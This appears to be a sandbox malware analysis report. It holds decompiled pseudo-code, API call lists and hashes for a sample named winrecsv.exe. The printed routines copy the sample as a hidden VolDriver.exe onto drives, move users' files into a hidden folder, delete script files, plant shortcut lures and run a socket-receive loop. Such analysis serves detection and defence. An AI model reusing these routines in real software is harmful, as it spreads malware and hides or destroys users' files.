                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DriveTypelstrcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3664088370-0
                                                                                  • Opcode ID: aed3bbd9218a36ae3e4d8c15ba3d6df83cbfa9a0731111e7d8ec09f3f9f4cc49
                                                                                  • Instruction ID: bb802be56eedc3909057cb4b444c6c3d96b1217a29676591d358a89cf413bc85
                                                                                  • Opcode Fuzzy Hash: aed3bbd9218a36ae3e4d8c15ba3d6df83cbfa9a0731111e7d8ec09f3f9f4cc49
                                                                                  • Instruction Fuzzy Hash: 1CF01DB5D00248FBDB00DFA4D455BDEB7B4EF44304F04C5A9E915AB341E679AB18CB89
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00404BD0(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16) {
                                                                                  				short _v524;
                                                                                  				short _v1044;
                                                                                  				short _v1564;
                                                                                  				short _v2084;
                                                                                  				intOrPtr _v2088;
                                                                                  				short _v2612;
                                                                                  				short _v3132;
                                                                                  				char _v3133;
                                                                                  				struct _WIN32_FIND_DATAW _v3732;
                                                                                  				short _v4252;
                                                                                  				void* _v4256;
                                                                                  				short _v4780;
                                                                                  				intOrPtr _v4784;
                                                                                  				WCHAR* _v4788;
                                                                                  				WCHAR* _v4792;
                                                                                  				WCHAR* _v4796;
                                                                                  				WCHAR* _v4800;
                                                                                  				WCHAR* _v4804;
                                                                                  				intOrPtr _v4808;
                                                                                  				WCHAR* _v4812;
                                                                                  				WCHAR* _v4816;
                                                                                  				WCHAR* _v4820;
                                                                                  				WCHAR* _v4824;
                                                                                  				WCHAR* _v4828;
                                                                                  				WCHAR* _v4832;
                                                                                  				WCHAR* _v4836;
                                                                                  				WCHAR* _v4840;
                                                                                  				WCHAR* _v4844;
                                                                                  				WCHAR* _v4848;
                                                                                  				WCHAR* _v4852;
                                                                                  				WCHAR* _v4856;
                                                                                  				WCHAR* _v4860;
                                                                                  				signed char _v4861;
                                                                                  				signed char _v4862;
                                                                                  				signed int _v4868;
                                                                                  				signed int _v4872;
                                                                                  				intOrPtr _t167;
                                                                                  				intOrPtr _t195;
                                                                                  				void* _t218;
                                                                                  				void* _t219;
                                                                                  				void* _t224;
                                                                                  
                                                                                  				L0040F1AA();
                                                                                  				if((_a12 & 0x00080000) != 0) {
                                                                                  					return 0;
                                                                                  				}
                                                                                  				_v2088 = 0x4140cc;
                                                                                  				_v3133 = 0;
                                                                                  				wsprintfW( &_v1564, L"%s.lnk", _a8);
                                                                                  				wsprintfW( &_v4252, L"%s\\%s", _a4, _v2088);
                                                                                  				wsprintfW( &_v4780, L"%s\\%s\\VolDriver.exe", _a4, _v2088);
                                                                                  				wsprintfW( &_v2612, L"%s\\%s", _a4,  &_v1564);
                                                                                  				wsprintfW( &_v1044, L"%s\\*", _a4);
                                                                                  				_t224 = _t219 + 0x48;
                                                                                  				if(PathFileExistsW( &_v4780) != 0) {
                                                                                  					_t167 = E0040D530( &_v4780);
                                                                                  					_t224 = _t224 + 4;
                                                                                  					_v4784 = _t167;
                                                                                  					_t195 =  *0x414410; // 0x12e00
                                                                                  					if(_t195 != _v4784) {
                                                                                  						SetFileAttributesW( &_v4780, 0x80);
                                                                                  						DeleteFileW( &_v4780);
                                                                                  					}
                                                                                  				}
                                                                                  				if(PathFileExistsW( &_v4780) == 0) {
                                                                                  					if(PathFileExistsW( &_v4252) == 0 && CreateDirectoryW( &_v4252, 0) != 0) {
                                                                                  						SetFileAttributesW( &_v4252, 2);
                                                                                  					}
                                                                                  					if(PathFileExistsW( &_v4252) != 0 && CopyFileW(?str?,  &_v4780, 0) != 0) {
                                                                                  						SetFileAttributesW( &_v4780, 2);
                                                                                  					}
                                                                                  				}
                                                                                  				if(PathFileExistsW( &_v2612) == 0) {
                                                                                  					if((_a16 & 0x000000ff) == 0) {
                                                                                  						E00404980( &_v2612, L"shell32.dll", 8);
                                                                                  						_t224 = _t224 + 0xc;
                                                                                  					} else {
                                                                                  						E00404980( &_v2612, L"shell32.dll", 9);
                                                                                  						_t224 = _t224 + 0xc;
                                                                                  					}
                                                                                  					SetFileAttributesW( &_v2612, 1);
                                                                                  				}
                                                                                  				_v4256 = FindFirstFileW( &_v1044,  &_v3732);
                                                                                  				if(_v4256 == 0xffffffff) {
                                                                                  					L45:
                                                                                  					return _v3133;
                                                                                  				} else {
                                                                                  					_v4860 = L"*.lnk";
                                                                                  					_v4856 = L"*.vbs";
                                                                                  					_v4852 = L"*.js";
                                                                                  					_v4848 = L"*.scr";
                                                                                  					_v4844 = L"*.com";
                                                                                  					_v4840 = L"*.jse";
                                                                                  					_v4836 = L"*.cmd";
                                                                                  					_v4832 = L"*.pif";
                                                                                  					_v4828 = L"*.jar";
                                                                                  					_v4824 = L"*.dll";
                                                                                  					_v4820 = L"*.vbe";
                                                                                  					_v4816 = L"*.bat";
                                                                                  					_v4812 = L"*.inf";
                                                                                  					_v4808 = _v2088;
                                                                                  					_v4804 =  &_v1564;
                                                                                  					_v4800 = L"Thumbs.db";
                                                                                  					_v4796 = L"$RECYCLE.BIN";
                                                                                  					_v4792 = L"desktop.ini";
                                                                                  					_v4788 = L"System Volume Information";
                                                                                  					do {
                                                                                  						if(lstrcmpW( &(_v3732.cFileName), ".") != 0 && lstrcmpW( &(_v3732.cFileName), L"..") != 0) {
                                                                                  							_v4862 = 0;
                                                                                  							_v4868 = 0;
                                                                                  							while(_v4868 < 6) {
                                                                                  								if(lstrcmpiW( &(_v3732.cFileName),  *(_t218 + _v4868 * 4 - 0x12c4)) == 0) {
                                                                                  									_v4862 = 1;
                                                                                  									break;
                                                                                  								}
                                                                                  								_v4868 = _v4868 + 1;
                                                                                  							}
                                                                                  							if((_v4862 & 0x000000ff) == 0) {
                                                                                  								_v4861 = 0;
                                                                                  								_v4872 = 0;
                                                                                  								while(_v4872 < 0xd) {
                                                                                  									if(PathMatchSpecW( &(_v3732.cFileName),  *(_t218 + _v4872 * 4 - 0x12f8)) != 0) {
                                                                                  										wsprintfW( &_v2084, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                  										_t224 = _t224 + 0x10;
                                                                                  										SetFileAttributesW( &_v2084, 0x80);
                                                                                  										DeleteFileW( &_v2084);
                                                                                  										_v4861 = 1;
                                                                                  										break;
                                                                                  									}
                                                                                  									_v4872 = _v4872 + 1;
                                                                                  								}
                                                                                  								if((_v4861 & 0x000000ff) == 0) {
                                                                                  									if(PathFileExistsW( &_v4252) != 0) {
                                                                                  										wsprintfW( &_v3132, L"%s\\%s", _a4,  &(_v3732.cFileName));
                                                                                  										wsprintfW( &_v524, L"%s\\%s\\%s", _a4, _v2088,  &(_v3732.cFileName));
                                                                                  										_t224 = _t224 + 0x24;
                                                                                  										if((_v3732.dwFileAttributes & 0x00000010) == 0) {
                                                                                  											MoveFileExW( &_v3132,  &_v524, 9);
                                                                                  										} else {
                                                                                  											E00404A90( &_v3132,  &_v524);
                                                                                  											_t224 = _t224 + 8;
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  								goto L43;
                                                                                  							}
                                                                                  						}
                                                                                  						L43:
                                                                                  					} while (FindNextFileW(_v4256,  &_v3732) != 0);
                                                                                  					FindClose(_v4256);
                                                                                  					goto L45;
                                                                                  				}
                                                                                  			}












































                                                                                  0x00404bd8
                                                                                  0x00404be5
                                                                                  0x00000000
                                                                                  0x00404be7
                                                                                  0x00404bee
                                                                                  0x00404bf8
                                                                                  0x00404c0f
                                                                                  0x00404c2f
                                                                                  0x00404c4f
                                                                                  0x00404c6f
                                                                                  0x00404c88
                                                                                  0x00404c8e
                                                                                  0x00404ca0
                                                                                  0x00404ca9
                                                                                  0x00404cae
                                                                                  0x00404cb1
                                                                                  0x00404cb7
                                                                                  0x00404cc3
                                                                                  0x00404cd1
                                                                                  0x00404cde
                                                                                  0x00404cde
                                                                                  0x00404cc3
                                                                                  0x00404cf3
                                                                                  0x00404d04
                                                                                  0x00404d22
                                                                                  0x00404d22
                                                                                  0x00404d37
                                                                                  0x00404d5a
                                                                                  0x00404d5a
                                                                                  0x00404d37
                                                                                  0x00404d6f
                                                                                  0x00404d77
                                                                                  0x00404d9f
                                                                                  0x00404da4
                                                                                  0x00404d79
                                                                                  0x00404d87
                                                                                  0x00404d8c
                                                                                  0x00404d8c
                                                                                  0x00404db0
                                                                                  0x00404db0
                                                                                  0x00404dca
                                                                                  0x00404dd7
                                                                                  0x0040509f
                                                                                  0x00000000
                                                                                  0x00404ddd
                                                                                  0x00404ddd
                                                                                  0x00404de7
                                                                                  0x00404df1
                                                                                  0x00404dfb
                                                                                  0x00404e05
                                                                                  0x00404e0f
                                                                                  0x00404e19
                                                                                  0x00404e23
                                                                                  0x00404e2d
                                                                                  0x00404e37
                                                                                  0x00404e41
                                                                                  0x00404e4b
                                                                                  0x00404e55
                                                                                  0x00404e65
                                                                                  0x00404e71
                                                                                  0x00404e77
                                                                                  0x00404e81
                                                                                  0x00404e8b
                                                                                  0x00404e95
                                                                                  0x00404e9f
                                                                                  0x00404eb3
                                                                                  0x00404ed0
                                                                                  0x00404ed7
                                                                                  0x00404ef2
                                                                                  0x00404f18
                                                                                  0x00404f1c
                                                                                  0x00000000
                                                                                  0x00404f1c
                                                                                  0x00404eec
                                                                                  0x00404eec
                                                                                  0x00404f30
                                                                                  0x00404f37
                                                                                  0x00404f3e
                                                                                  0x00404f59
                                                                                  0x00404f7f
                                                                                  0x00404f9a
                                                                                  0x00404fa0
                                                                                  0x00404faf
                                                                                  0x00404fbc
                                                                                  0x00404fc2
                                                                                  0x00000000
                                                                                  0x00404fc2
                                                                                  0x00404f53
                                                                                  0x00404f53
                                                                                  0x00404fd9
                                                                                  0x00404fef
                                                                                  0x0040500d
                                                                                  0x00405034
                                                                                  0x0040503a
                                                                                  0x00405046
                                                                                  0x00405070
                                                                                  0x00405048
                                                                                  0x00405056
                                                                                  0x0040505b
                                                                                  0x0040505b
                                                                                  0x00405046
                                                                                  0x00404fef
                                                                                  0x00000000
                                                                                  0x00404fd9
                                                                                  0x00404f32
                                                                                  0x00405076
                                                                                  0x0040508a
                                                                                  0x00405099
                                                                                  0x00000000
                                                                                  0x00405099

                                                                                  APIs
                                                                                  • _chkstk.NTDLL(?,00405220,?,?,?), ref: 00404BD8
                                                                                  • wsprintfW.USER32 ref: 00404C0F
                                                                                  • wsprintfW.USER32 ref: 00404C2F
                                                                                  • wsprintfW.USER32 ref: 00404C4F
                                                                                  • wsprintfW.USER32 ref: 00404C6F
                                                                                  • wsprintfW.USER32 ref: 00404C88
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404C98
                                                                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 00404CD1
                                                                                  • DeleteFileW.KERNEL32(?), ref: 00404CDE
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404CEB
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404CFC
                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00404D0F
                                                                                  • SetFileAttributesW.KERNEL32(?,00000002), ref: 00404D22
                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404D2F
                                                                                  • CopyFileW.KERNEL32(C:\Windows\winrecsv.exe,?,00000000), ref: 00404D47
                                                                                  • SetFileAttributesW.KERNEL32(?,00000002), ref: 00404D5A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$wsprintf$ExistsPath$Attributes$CopyCreateDeleteDirectory_chkstk
                                                                                  • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDriver.exe$%s\*$C:\Windows\winrecsv.exe$shell32.dll$shell32.dll
                                                                                  • API String ID: 3833403615-3739611160
                                                                                  • Opcode ID: 62579ddd412223121d61bd6eea2e6a24c3e94b8aea53340661bac94d9f0a3f90
                                                                                  • Instruction ID: 56dfbe622999f3f4d946997a069b2a92ca57c1f224be27ae97978ead2f5811f9
                                                                                  • Opcode Fuzzy Hash: 62579ddd412223121d61bd6eea2e6a24c3e94b8aea53340661bac94d9f0a3f90
                                                                                  • Instruction Fuzzy Hash: BBD170B4900219AFCB20DF60DC44BEA77B8BF44304F0485E9F609A6290D7B99BD4CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00404A90(WCHAR* _a4, char _a8) {
                                                                                  				short _v524;
                                                                                  				struct _WIN32_FIND_DATAW _v1116;
                                                                                  				void* _v1120;
                                                                                  				short _v1644;
                                                                                  				short _v2164;
                                                                                  				void* _t29;
                                                                                  				void* _t60;
                                                                                  				void* _t61;
                                                                                  
                                                                                  				_t1 =  &_a8; // 0x40505b
                                                                                  				CreateDirectoryW( *_t1, 0);
                                                                                  				wsprintfW( &_v524, L"%s\\*", _a4);
                                                                                  				_t61 = _t60 + 0xc;
                                                                                  				_t29 = FindFirstFileW( &_v524,  &_v1116);
                                                                                  				_v1120 = _t29;
                                                                                  				if(_v1120 == 0xffffffff) {
                                                                                  					return _t29;
                                                                                  				} else {
                                                                                  					goto L1;
                                                                                  				}
                                                                                  				do {
                                                                                  					L1:
                                                                                  					if(lstrcmpW( &(_v1116.cFileName), ".") != 0 && lstrcmpW( &(_v1116.cFileName), L"..") != 0) {
                                                                                  						wsprintfW( &_v1644, L"%s\\%s", _a4,  &(_v1116.cFileName));
                                                                                  						_t14 =  &_a8; // 0x40505b
                                                                                  						wsprintfW( &_v2164, L"%s\\%s",  *_t14,  &(_v1116.cFileName));
                                                                                  						_t61 = _t61 + 0x20;
                                                                                  						if((_v1116.dwFileAttributes & 0x00000010) == 0) {
                                                                                  							MoveFileExW( &_v1644,  &_v2164, 9);
                                                                                  						} else {
                                                                                  							E00404A90( &_v1644,  &_v2164);
                                                                                  							_t61 = _t61 + 8;
                                                                                  						}
                                                                                  					}
                                                                                  				} while (FindNextFileW(_v1120,  &_v1116) != 0);
                                                                                  				FindClose(_v1120);
                                                                                  				return RemoveDirectoryW(_a4);
                                                                                  			}











                                                                                  0x00404a9b
                                                                                  0x00404a9f
                                                                                  0x00404ab5
                                                                                  0x00404abb
                                                                                  0x00404acc
                                                                                  0x00404ad2
                                                                                  0x00404adf
                                                                                  0x00404bc2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404ae5
                                                                                  0x00404ae5
                                                                                  0x00404af9
                                                                                  0x00404b2a
                                                                                  0x00404b3a
                                                                                  0x00404b4a
                                                                                  0x00404b50
                                                                                  0x00404b5c
                                                                                  0x00404b86
                                                                                  0x00404b5e
                                                                                  0x00404b6c
                                                                                  0x00404b71
                                                                                  0x00404b71
                                                                                  0x00404b5c
                                                                                  0x00404ba0
                                                                                  0x00404baf
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • CreateDirectoryW.KERNEL32([P@,00000000), ref: 00404A9F
                                                                                  • wsprintfW.USER32 ref: 00404AB5
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00404ACC
                                                                                  • lstrcmpW.KERNEL32(?,00411594), ref: 00404AF1
                                                                                  • lstrcmpW.KERNEL32(?,00411598), ref: 00404B07
                                                                                  • wsprintfW.USER32 ref: 00404B2A
                                                                                  • wsprintfW.USER32 ref: 00404B4A
                                                                                  • MoveFileExW.KERNEL32(?,?,00000009), ref: 00404B86
                                                                                  • FindNextFileW.KERNEL32(000000FF,?), ref: 00404B9A
                                                                                  • FindClose.KERNEL32(000000FF), ref: 00404BAF
                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00404BB9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                  • String ID: %s\%s$%s\%s$%s\*$[P@
                                                                                  • API String ID: 92872011-505645206
                                                                                  • Opcode ID: b47613f4efcc78fc372a5197ceb720a83a34bcc65ffc30f7c0cf28f594637780
                                                                                  • Instruction ID: 4312a352e9e7f9f4b9df3eadcbdfd99b35f9a62cedde5f9254868b67503f5fd5
                                                                                  • Opcode Fuzzy Hash: b47613f4efcc78fc372a5197ceb720a83a34bcc65ffc30f7c0cf28f594637780
                                                                                  • Instruction Fuzzy Hash: 5D3178B5900218ABCB10DBA0DC88FEA7778AB88311F40C599F709A7155DB75EAC4CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 58%
                                                                                  			E0040B8F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				char _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				intOrPtr _t38;
                                                                                  				intOrPtr _t43;
                                                                                  
                                                                                  				_v12 = _a16;
                                                                                  				if(_a16 != 0xffffffff) {
                                                                                  					_v12 = GetTickCount() + _v12;
                                                                                  				}
                                                                                  				_v8 = _a8;
                                                                                  				while(1) {
                                                                                  					_v16 = 0;
                                                                                  					_t38 = _a4;
                                                                                  					__imp__#10(_t38, 0x4004667f,  &_v16);
                                                                                  					if(_t38 == 0xffffffff) {
                                                                                  						break;
                                                                                  					}
                                                                                  					if(_v16 > 0) {
                                                                                  						if(_v16 >= _a12) {
                                                                                  							_v24 = _a12;
                                                                                  						} else {
                                                                                  							_v24 = _v16;
                                                                                  						}
                                                                                  						_t43 = _a4;
                                                                                  						__imp__#16(_t43, _v8, _v24, 0);
                                                                                  						_v20 = _t43;
                                                                                  						if(_v20 > 0) {
                                                                                  							if(_a16 != 0xffffffff) {
                                                                                  								_v12 = GetTickCount() + _a16;
                                                                                  							}
                                                                                  							_a12 = _a12 - _v20;
                                                                                  							_v8 = _v8 + _v20;
                                                                                  						}
                                                                                  					}
                                                                                  					Sleep(1);
                                                                                  					if(GetTickCount() > _v12 || _a12 == 0) {
                                                                                  						L15:
                                                                                  						return 0 | _a12 == 0x00000000;
                                                                                  					} else {
                                                                                  						continue;
                                                                                  					}
                                                                                  				}
                                                                                  				goto L15;
                                                                                  			}










                                                                                  0x0040b8f9
                                                                                  0x0040b900
                                                                                  0x0040b90b
                                                                                  0x0040b90b
                                                                                  0x0040b911
                                                                                  0x0040b914
                                                                                  0x0040b914
                                                                                  0x0040b924
                                                                                  0x0040b928
                                                                                  0x0040b931
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040b939
                                                                                  0x0040b941
                                                                                  0x0040b94e
                                                                                  0x0040b943
                                                                                  0x0040b946
                                                                                  0x0040b946
                                                                                  0x0040b95b
                                                                                  0x0040b95f
                                                                                  0x0040b965
                                                                                  0x0040b96c
                                                                                  0x0040b972
                                                                                  0x0040b97d
                                                                                  0x0040b97d
                                                                                  0x0040b986
                                                                                  0x0040b98f
                                                                                  0x0040b98f
                                                                                  0x0040b96c
                                                                                  0x0040b994
                                                                                  0x0040b9a3
                                                                                  0x0040b9af
                                                                                  0x0040b9bb
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040b9a3
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040B902
                                                                                  • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040B928
                                                                                  • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040B95F
                                                                                  • GetTickCount.KERNEL32 ref: 0040B974
                                                                                  • Sleep.KERNEL32(00000001), ref: 0040B994
                                                                                  • GetTickCount.KERNEL32 ref: 0040B99A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick$Sleepioctlsocketrecv
                                                                                  • String ID:
                                                                                  • API String ID: 107502007-0
                                                                                  • Opcode ID: 57e4b55e86ac30973883d8742beb8e663d4481874e8f35f8e3ef745012922632
                                                                                  • Instruction ID: b5ebabbcfa87b5d5b6093c606dafa0a0568610fd24292d9ee39f828ceab0bc2d
                                                                                  • Opcode Fuzzy Hash: 57e4b55e86ac30973883d8742beb8e663d4481874e8f35f8e3ef745012922632
                                                                                  • Instruction Fuzzy Hash: 2831F0B4900209DFCB04DFA8D948BEE7BB1FF44315F108669E915A3390D7749A90CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 82%
                                                                                  			E0040E7A0(intOrPtr* _a4) {
                                                                                  				intOrPtr _v64;
                                                                                  				char _v68;
                                                                                  				long _v72;
                                                                                  				signed char _v80;
                                                                                  				long _v92;
                                                                                  				char _v96;
                                                                                  				char _v100;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __ebp;
                                                                                  				long _t31;
                                                                                  				long _t33;
                                                                                  				long _t34;
                                                                                  				long _t42;
                                                                                  				intOrPtr _t49;
                                                                                  				intOrPtr* _t56;
                                                                                  				intOrPtr _t70;
                                                                                  				intOrPtr* _t73;
                                                                                  				long _t74;
                                                                                  				intOrPtr _t75;
                                                                                  				struct _CRITICAL_SECTION* _t76;
                                                                                  				intOrPtr* _t77;
                                                                                  				void* _t78;
                                                                                  				signed int _t79;
                                                                                  				void* _t81;
                                                                                  
                                                                                  				_t81 = (_t79 & 0xfffffff8) - 0x44;
                                                                                  				_t31 = GetTickCount();
                                                                                  				_t56 = _a4;
                                                                                  				_v72 = _t31;
                                                                                  				_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                  				if(_t33 == 0) {
                                                                                  					L25:
                                                                                  					return _t33;
                                                                                  				} else {
                                                                                  					goto L1;
                                                                                  				}
                                                                                  				do {
                                                                                  					L1:
                                                                                  					_t73 = _t56 + 0x18;
                                                                                  					__imp__WSAWaitForMultipleEvents(1, _t73, 0, 0, 0);
                                                                                  					if(_t33 != 0x102) {
                                                                                  						__imp__WSAEnumNetworkEvents( *((intOrPtr*)(_t56 + 0x14)),  *_t73,  &_v68);
                                                                                  						if((_v80 & 0x00000008) != 0 && _v64 == 0 &&  *_t56 == 0x494f4350) {
                                                                                  							_t49 =  *((intOrPtr*)(_t56 + 0x14));
                                                                                  							_v100 = 0x10;
                                                                                  							__imp__#1(_t49,  &_v96,  &_v100);
                                                                                  							if(_t49 != 0xffffffff) {
                                                                                  								_t77 = E0040E330(_t56, _t49);
                                                                                  								_t81 = _t81 + 4;
                                                                                  								if(_t77 != 0) {
                                                                                  									_t15 = _t77 + 0x264; // 0x264
                                                                                  									E0040E5C0(0, _t77, _t56, _t15);
                                                                                  									_t81 = _t81 + 8;
                                                                                  									if( *((char*)(_t77 + 0x274)) == 0 &&  *_t77 == 0x69636c69) {
                                                                                  										E0040EB70(_t77);
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					_t34 = GetTickCount();
                                                                                  					_t74 = _v92;
                                                                                  					if(_t34 - _t74 < 0x3e8) {
                                                                                  						if(GetTickCount() - _t74 < 0x2710) {
                                                                                  							goto L24;
                                                                                  						}
                                                                                  						EnterCriticalSection(_t56 + 0x20);
                                                                                  						_t75 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                  						if(_t75 == 0) {
                                                                                  							L23:
                                                                                  							LeaveCriticalSection(_t56 + 0x20);
                                                                                  							_v92 = GetTickCount();
                                                                                  							goto L24;
                                                                                  						} else {
                                                                                  							goto L19;
                                                                                  						}
                                                                                  						do {
                                                                                  							L19:
                                                                                  							_t42 = InterlockedExchangeAdd(_t75 + 4, 0);
                                                                                  							if(E0040C210() - _t42 >= 0x1e) {
                                                                                  								_t45 =  *((intOrPtr*)(_t75 + 0x260));
                                                                                  								if( *((intOrPtr*)(_t75 + 0x260)) != 0xffffffff) {
                                                                                  									E00409940(_t45);
                                                                                  									_t81 = _t81 + 4;
                                                                                  									 *((intOrPtr*)(_t75 + 0x260)) = 0xffffffff;
                                                                                  								}
                                                                                  							}
                                                                                  							_t75 =  *((intOrPtr*)(_t75 + 0x280));
                                                                                  						} while (_t75 != 0);
                                                                                  						goto L23;
                                                                                  					}
                                                                                  					_t76 = _t56 + 0x20;
                                                                                  					EnterCriticalSection(_t76);
                                                                                  					_t70 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                  					if(_t70 == 0) {
                                                                                  						L16:
                                                                                  						LeaveCriticalSection(_t76);
                                                                                  						goto L24;
                                                                                  					}
                                                                                  					while( *((intOrPtr*)(_t70 + 0x260)) != 0xffffffff) {
                                                                                  						_t70 =  *((intOrPtr*)(_t70 + 0x280));
                                                                                  						if(_t70 != 0) {
                                                                                  							continue;
                                                                                  						} else {
                                                                                  							LeaveCriticalSection(_t76);
                                                                                  							goto L24;
                                                                                  						}
                                                                                  					}
                                                                                  					E0040E6A0(_t56, _t70, _t78);
                                                                                  					goto L16;
                                                                                  					L24:
                                                                                  					_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                  				} while (_t33 != 0);
                                                                                  				goto L25;
                                                                                  			}




























                                                                                  0x0040e7a6
                                                                                  0x0040e7ac
                                                                                  0x0040e7b2
                                                                                  0x0040e7b5
                                                                                  0x0040e7bf
                                                                                  0x0040e7c7
                                                                                  0x0040e949
                                                                                  0x0040e94f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040e7cd
                                                                                  0x0040e7cd
                                                                                  0x0040e7d3
                                                                                  0x0040e7d9
                                                                                  0x0040e7e4
                                                                                  0x0040e7f6
                                                                                  0x0040e801
                                                                                  0x0040e812
                                                                                  0x0040e820
                                                                                  0x0040e828
                                                                                  0x0040e831
                                                                                  0x0040e83b
                                                                                  0x0040e83d
                                                                                  0x0040e842
                                                                                  0x0040e844
                                                                                  0x0040e850
                                                                                  0x0040e855
                                                                                  0x0040e85f
                                                                                  0x0040e86b
                                                                                  0x0040e86b
                                                                                  0x0040e85f
                                                                                  0x0040e842
                                                                                  0x0040e831
                                                                                  0x0040e801
                                                                                  0x0040e876
                                                                                  0x0040e878
                                                                                  0x0040e883
                                                                                  0x0040e8cc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040e8d2
                                                                                  0x0040e8d8
                                                                                  0x0040e8dd
                                                                                  0x0040e921
                                                                                  0x0040e925
                                                                                  0x0040e931
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040e8df
                                                                                  0x0040e8df
                                                                                  0x0040e8e5
                                                                                  0x0040e8f7
                                                                                  0x0040e8f9
                                                                                  0x0040e902
                                                                                  0x0040e905
                                                                                  0x0040e90a
                                                                                  0x0040e90d
                                                                                  0x0040e90d
                                                                                  0x0040e902
                                                                                  0x0040e917
                                                                                  0x0040e91d
                                                                                  0x00000000
                                                                                  0x0040e8df
                                                                                  0x0040e885
                                                                                  0x0040e889
                                                                                  0x0040e88f
                                                                                  0x0040e894
                                                                                  0x0040e8ba
                                                                                  0x0040e8bb
                                                                                  0x00000000
                                                                                  0x0040e8bb
                                                                                  0x0040e896
                                                                                  0x0040e89f
                                                                                  0x0040e8a7
                                                                                  0x00000000
                                                                                  0x0040e8a9
                                                                                  0x0040e8aa
                                                                                  0x00000000
                                                                                  0x0040e8aa
                                                                                  0x0040e8a7
                                                                                  0x0040e8b5
